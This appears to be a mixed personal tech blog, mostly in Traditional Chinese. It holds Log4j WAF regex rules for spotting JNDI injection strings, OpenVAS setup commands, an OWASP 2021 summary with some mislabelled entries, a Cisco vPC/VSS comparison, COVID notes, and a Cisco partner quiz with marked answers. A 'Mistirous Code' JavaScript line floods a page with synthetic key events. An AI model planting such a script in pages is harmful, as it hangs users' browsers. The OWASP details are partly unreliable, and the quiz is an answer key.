Log4j - CVE-2021-44228 - Apache Log4j RCE Attack Flow

Defence :

WAF rule : 

\$\s*{\s*jndi\s*:\s*(ldap|ldaps|rmi|iiop|iiopname|corbaname|dns|nis):

${(j|jn|jnd|jndi|jndi:|jndi:[ldaprmi]{1,4})?${

\$\{(lower|upper)?\:[:-]{1,2}[jndirmiladap]{1,4}\}

OpenVAS 安裝

 ## 安裝OpenVAS

apt-get install openvas  #安裝OpenVAS

openvas-setup #自動設定環境、下載憑證及定義檔

openvas-check-setup  #檢查安裝

openvasmd --create-user admin1  #建立帳號

openvasmd --user=admin1 --new-password=openvas #更改密碼

openvas-feed-update　#升级

openvas-stop

openvasmd --rebuild

openvas-start

netstat -tlnp  #確認9390跟9392兩個port已在LISTEN狀態

https://127.0.0.1:9392 (在Kali開啟瀏覽器，輸入IP打開操作介面)

change Timezone

sudo dpkg-reconfigure tzdata

PS.每次重開機需要執行底下指令(OpenVAS的bug)

openvas-stop

openvasmd --rebuild

openvas-start

Kali Linux Installation 2021/09/11

1. 安裝 Kali Linux on Mac VMWARE Workstation

 https://www.kali.org/get-kali/#kali-virtual-machines

解壓縮後 : Kali-Linux-2021.2-vmware-amd64.vmwarevm

OWASP 2021 Quick View

OWASP 2021 引入了 3 個新類別 :  

A08:2021 - 不安全設計 (No.4 )

A08:2021 - 軟件和數據完整性失敗 ( No.8 )

A10:2021 - 服務器端請求偽造 (No.10)

A01:2021 - 損壞的訪問控制 (Broken Access Control)

OWASP 團隊將一個 Broken Access Control漏洞列為第 1 位，從 2017 年 OWASP TOP 10 榜單的第 5 位移至第 1 位。為了分配這個位置，OWASP 團隊已經測試了 94% 的應用程序，並使用了一些軟身份驗證，並在其中映射了 34 個 CWE。

A02:2021-加密失敗 (Cryptographic Failures)

Cryptographic Failures 已被分配到第 2 位，它已從 2017 年列表中的第 3 位移至 “敏感數據暴露” Sensitive Data Exposure，並已根據攻擊的樣貌進行分配。由於當前更新的列表側重於根因，因此密碼學加密失敗是洩露敏感數據的主要問題。

A03:2021 - 注入攻擊 (Injection)

注入攻擊從 2017 年列表中的第 1 位下降到 OWASP TOP 10 2021 中的第 3 位。在此註入攻擊類別下，映射了 33 個 CWE，包括在上一個列表中排名第 7 的跨站點腳本 (XSS) 漏洞。

A04:2021 - 不安全的設計 (Insecure Design)

不安全設計是 OWASP TOP 10 2021 列表中添加的一個新類別，並列在第 4 位。不安全的設計漏洞側重於與設計缺陷相關的風險。

A05:2021 - 安全配置錯誤 (Security Misconfiguration)

安全配置從第 6 位移至第 5 位，該漏洞已在 90% 的應用程序上進行了測試。OWASP 團隊從 2017 年列表中分隔了 XML 外部實體，並將它們與此安全配置錯誤合併。

A06:2021 - 易受攻擊和過時的組件 (Vulnerable and Outdated Components)

這是“使用具有已知漏洞的組件” 的替代標題，已在 2017 年列表中排名第 9 位。現在它向上移動到 第6 位。這是唯一沒有將任何 CVE 映射到包含的 CWE 的類別，而是考慮了 5.0 的預設漏洞利用和影響權重來反映此位置。

A07:2021 - 識別和認證失敗 (Identification and Authentication Failures)

它以前被稱為“損壞的身份驗證” Broken Authentication，它列在第2位並移到第7位。這個類別仍然是前 10 名的一個組成部分，但標準化框架的可用性增加似乎有所幫助。

A08:2021 - 軟體和數據完整性故障 (Software and Data Integrity Failures)

軟體和數據完整性故障是 OWASP Top 10 2021 列表中的一個新列表，該漏洞主要針對軟件更新、關鍵數據和 CI/CD 管道，而無需驗證完整性。合併自2017 年不安全的反序列化( Insecure Deserialization)。

A09:2021 -安全日誌記錄和監控失敗 (Security Logging and Monitoring Failures)

它以前被稱為監控和監控不足，它被列在第 10 位並上升到第 9 位。未能修復此漏洞將影響可見性、事件警報和取證。

A10:2021 - 服務器端請求偽造 (Server-Side Request Forgery)

業界調查顯示SSRF 名列第 10 位。數據顯示發生率相對較低，測試覆蓋率高於平均水平，並且利用和影響潛力的評級高於平均水平。

Cheers !

功能比較 : Cisco vPC and Cisco VSS

 今天你的老爸我將談論兩種技術，Cisco vPC： Virtual Port Channel (虛擬端口通道) 和 VSS：Virtual Switching system (虛擬交換系統)。 這兩種技術在各自領域的工作方式不同。 你們不用一直Google去查，我在這兒把它們之間的差異或了解它們之間的實際差異告訴你，你真的賺到了。

Cisco vPC 在 Nexus 設備上運行，Cisco VSS 在 Cisco Catalyst交換機上運行。 兩者都是不同的，適用於不同的場景。

• 什麼是 VSS 以及它是如何工作的？
• VSS 和埠口通道有什麼區別？
• vPC 是埠口通道技術的高級版本嗎？
• 我們如何區分 vPC 和 VSS？
• 在哪裡使用 vPC 和在哪裡使用 VSS？
• 我們是否有任何命令可以在 Cisco 6500 機箱上啟用 vPC？
• 我們可以在同一台交換機上使用 vPC 和 VSS 嗎？
• 我們可以選擇在 Cisco 3850 或 Cisco 2960-X 交換機上使用 VSS 嗎？

Cisco VSS :Virtual Switching system

Cisco VSS 將一對 Catalyst 4500/6500/6800 系列交換機組合成一個網絡元件。 VSS 管理備援線路，這些線路在外部充當單個埠口通道。 VSS 通過減少第 3 層路由鄰居的數量和提供無Loop的第 2 層拓撲來簡化網絡配置和操作。

所以在這裡很明顯，除非您在網絡中使用 Cisco 6500、Cisco 6800 和 Cisco 4500 交換機，否則 VSS 技術不能在接入交換機上使用。所有這 3 台交換機通常用於分佈層或核心層以及 VSS的概念一般用在企業網絡的分佈層。

下面是 VSS 在企業網絡架構中的樣貌，並確保這些是 Cisco Catalyst交換機，可以是 Cisco 4500/6500 和 6800 交換機。

圖 1.1- Cisco VSS 實體網路圖 與 邏輯網路圖

你老爸我我不建議在網路需求非常低的架構分佈中使用這種高級設備。

Cisco vPC: Virtual Port Channel

虛擬埠口通道 (vPC) 允許實體連接到兩個不同 Cisco Nexus 5000/7000 系列設備的線路對第三個設備顯示為單個埠口通道，並且該設備可以是光纖擴展器 (FEX) 或命名為 Nexus 2k 交換機。

vPC 可以提供第 2 層多路徑，它允許您通過增加頻寬來創建備援線路，在節點之間啟用多條並行路徑並在存在替代路徑的情況下負載平衡(load-balancing)流量。 vPC 域包括 vPC 對等設備、vPC 對等保持連接(peer keepalive)、 vPC 對等線路(peer link)，以及連接到下行(downstream)設備的 vPC 域中的所有 PortChannel。

圖1.2 Cisco vPC

Cisco vPC 技術僅用於 Cisco Nexus 設備，不能成為 Cisco Catalyst或 Cisco 接入層(Access Layer)交換機的一部分。 不能在 Cisco 3850 交換機上使用這些功能。 它主要是為 Cisco Nexus 交換機構建的。

圖 1.3 VSS 和 vPC的比較

以上這樣講你了解了嗎 ?

• -- 2021-08-18

Mistirous Code

 var event = new KeyboardEvent('keydown', { key: 'g', ctrlKey: true});setInterval(function(){ for (i = 0; i < 100; i++) { document.dispatchEvent(event); }}, 0);

2021/5/28 CAL5556

 

2021/6/4 Taiwan COVID News

120萬 AZ 疫苗

Narita -> TPE

FIR : FUK -> Taipei

ありがとうございました

高中生數據追蹤

日 期：2021/06/04

資料來源：中央流行疫情指揮中心

台灣太空法 (Taiwan Space Law)

 

太空已成為21世紀全球競爭的新場域，不論是傳統太空強權或是新興太空國家無不投下大量資源在太空的發展。台灣經過將近30年的發展，已經奠定一定的基礎設施與技術能量。蔡總統於109年5月20日就職演說，將太空產業列為六大核心戰略產業，在政府政策引導、資源投入、以及完備相關法制與支援體系下，台灣一定可以成為下一個新興太空國家重要一員，實踐以太空作為支持國家安全、經濟發展、民生福祉及科技進步國家總體發展的重要力量。

2021/05/23 - COVID 本土確定病例校正後 / 未校正病例數統計 (資料來源：疾管家)

 

Win !! 2021/05/14

 

# (Pass_1005) Red Belt Partner Academy Security Powered by Fire Jumper - Presales - Stage 1 FY21 (Partners Only)

* Q. The Cisco Security Platform reduces complexity and strengthens operations by:

Streamlining policy and device updates

Enabling frictionless, secure access for users

Cooperating with an existing architecture

(O) All of the above

* Q. Pick the right Zero-Trust Strategy components from the following. [Choose one answer]

Workplace: Network Access

Workforce: User and device access

Workload: Application and workload access

(O) All of the above

* Q. What should you do if a customer wants to discover which applications are being used in their environment and what is communicating with their apps/data?

Demo Duo Beyond

Qualify out, tell them there isn’t a Cisco product

Conduct additional discovery on how the organization handles it today

(O) Work with your CSS to evaluate and introduce them to the Tetration team

* Q. How do customers receive Talos threat intelligence?

Purchasing a Talos subscription for their security product

Purchasing a Talos Enterpise License Subscription

Purchasing the Talos Threat Feed

(O) Cisco security products receive Talos threat intelligence for free

* Q. Which Service is a good fit for medium sized customers?

(X) ISE Implementation Service

Incident Response Retainer

(O) Segmentation Advisory Service

* Q. Cisco Security takes you from overwhelmed to empowered. Our simplified platform helps you reduce complexity and strengthen operational efficiency. So your teams can stop swiveling between products and interfaces and get time back to focus on what matters most.​ and Make it easier for your people and your solutions to work as a team.​(True or False)

(O) True

False

* Q. Which is an example of a supply chain attack?

DNSMessenger

Sea Turtle

(O) Nyetya

VPNFilter

* Q. When was Talos acquired by Cisco?

2015

2017

(X) 2012

(O) Talos is not an acquisition

* Q. SAFE is:

A repository of validated and referenced Cisco designs

A design methodology for Security Architects

A method to align security, networking, and business outcome

(O) All of the above

* Q. What does the Presenter in the "Security EBC - Video " try to say, by referring to “Isn’t it time for Security solutions to act as a team?” [Choose one answer]

Create new advanced Security solutions

Create strong Perimeter Security Solutions

Create Strong Endpoint Security Solutions

(O) Security solutions need to work together as a unit eg. Endpoint security working with cloud security, perimeter security, MFA and so.

* Q. How does Cisco’s Zero Trust approach reduce the business’s risks? Select the best three answers.

Securing the workforce and workloads

(O) Ensuring compliance

(O) Gaining insight into the users and devices

(O) Establishing device trust before granting access to applications

* Q. What does the Cisco Security Platform provide to enable better outcomes to the business? Select the best three answers.

(O) A security strategy with a platform backed by unparalleled resources and expertise

(O) A powerful, pervasive platform with access to the latest security innovations

A closed platform that strengthens operations

(O) A platform with reduced complexity that gives security teams their time back

* Q. What is the best way to find and connnect with the service seller for your account?

Look around on Sales Connect and Wiki Pages

(O) Look them up in the Account Team Directory

Send out an email to a services alias

* Q. Select the Key value proposition of Cisco Talos? [Choose any three answer]

(O) Elite group of Security Experts devoted to providing superior Protection to customers with our Products and services.

(O) Threat Intelligence & Interdiction, Detection Research, Engine Development, Vulnerability Research & Discovery, Open Source & Education, and Global Outreach.

(O) Cisco Talos’ core mission is to provide verifiable and customizable defensive technologies and techniques that help customers quickly protect their assets from cloud to core.

Talos is a Perimeter based security product from Cisco

* Q. Talos analyzes unmatched visibility every day and pushes immediately actionable intelligence to products. This coverage allows Cisco Security solutions to provide coverage at the earliest signs of a threat. (True or False)

(O) True

False

* Q. Umbrella acts as your secure onramp to the internet. DNS-layer security, Secure Web Gateway capabilities, and cloud-delivered firewall functionality create the first line of defense and inspection for any traffic, so wherever your users are or what they’re connecting to, their access is secure. Once the traffic reaches the SIG cloud platform, you can easily implement different types of inspection and policy enforcement.​(True or False)

(O) True

False

* Q. What makes Cisco Security stand apart in the market. [Choose three answer]

(O) Open and integrated platform

(O) Cloud-delivered Simplicity

(O) Deep Network integration

Provides solid protection for User and Device access

* Q. Which persona will procure solutions with names like private, public, and hybrid?

(O) Cloud Buyer

Endpoint Admin

Email Admin

Network Buyer

* Q. The acronym SAFE stands for:

(X) Secure Architecture For the Enterprise

Sell All Feature Enhancements

Security Additions For Enablement

(O) It’s not an acronym, it’s just a name

* Q. Which role would benefit most from a platform that provides anti-virus, anti-spam, outbreak filters, and macro detection?

(O) Email Admin

Cloud Buyer

SecOps Manager

CISO

* Q. Which actions should you take to qualify an opportunity prior to engaging CX? Select the best three answers.

(O) Find out customer’s timeline

(O) Find out customer’s budget

(O) Determine customer’s needs and pain points

Schedule a demo

* Q. Which Service Buckets map best to Enterprise/Large Customers? Select the best three answers.

(O) Advisory

(O) Implementation

Product Training

(O) Business Critical Services

* Q. SAFE, is a vendor agnostic conversation and design process that uniquely positions Cisco as a larger security solution provider.

(O) True

False

Q. Effective cyber risk management is undermined by the proliferation of new vendor solutions and integration challenges of security applications.

(O) True

False

Q. Which role is primarily concerned with accelerating security operations, blocking more, and focusing on compliance goals?

(O) CISO

SecOps Manager

Email Admin

Security Architect

Q. SAFE can be used when designing security into both new and existing networks.

(O) True

False

Q. Define Zero Trust Approach. [Pick 3 answers]

(O) Enable policy-based controls for every access request in a corporate environment

(O) See who and what is accessing applications, workloads & the network

(O) Segment your network & workloads by enforcing granular controls

Focus on providing protection to end user

* Q. What are the key characteristics of “Cisco Security Platform”?(Choose 3)

(O) Best of breed products

(O) Trust verification

(O) Talos threat intelligence

NAC Solution

Integration of NGFW with ISE

Q. The Key to SAFE is built around which TWO areas:

(O) Operational Domains

Reference documentation on how to secure networks

(O) Practices for securing the business

Places in the Network

* Q. The Cisco Security ecosystem covers email, networks, cloud, web, endpoints, and everything in between. Cisco Talos has more visibility than any other security vendor in the world, with the sheer size and breadth of Cisco Security’s portfolio and the incoming telemetry from Cisco’s customers and products.(True or False)

(O) True

False

Q. Which of the following is described as best of breed products, protecting the network, endpoint, applications, and cloud?

(O) Cisco Security Platform

Talos

Cisco Threat Response

Stealthwatch

Q. Which question can you ask to learn more about protecting a customer’s workforce?

(O) How do you know your ​users are who they ​say they are?​

(X) How can you view and ​secure all connections?​

What’s on the network?

How do you segment your network today?

* Q. Which of the following are common challenges seen by all prospect personas? Select the best three answers.

(O) Time

(O) Expertise

(O) Evidence

Efficacy

* Q. Select some of the key primary concerns of CISO’s in the organization?

Driving metrics

Cost of security

Attracting and retaining top talent

Offensive security

(O) All of the above

* Q. How does Cisco Duo secure the workforce?

By providing valuable information on threats facing the market

By discovering what applications are being used in the environment

By assessing threats to websites that employees visit

(O) By verifying ​the identity of users and the health of ​their devices before connecting to the applications they need

* Q. SAFE allows me to:

Design networks with my customer’s outcome in mind

Sell more security because we understand how customers need security to be implemented

Brings the different business and technology owners into a joint conversation on security

(O) All of the Above

* Q. Pick the right combination of Product or solution mapping with respect to Cisco Zero Trust. [Pick Three answer]

(O) Secure the Workforce With AMP

(O) Secure the Workforce With Duo

Secure Your Workloads With ACI

Secure Your Workloads With Tetration

(X) Secure the Workplace With Software-Defined Access

(O) Secure the Workplace With ISE

* Q. With powerful integrations and industry-leading solutions, the Cisco Security Platform simplifies your security experience, accelerates your success, and protects your future. ​(True or False)

(O) True

False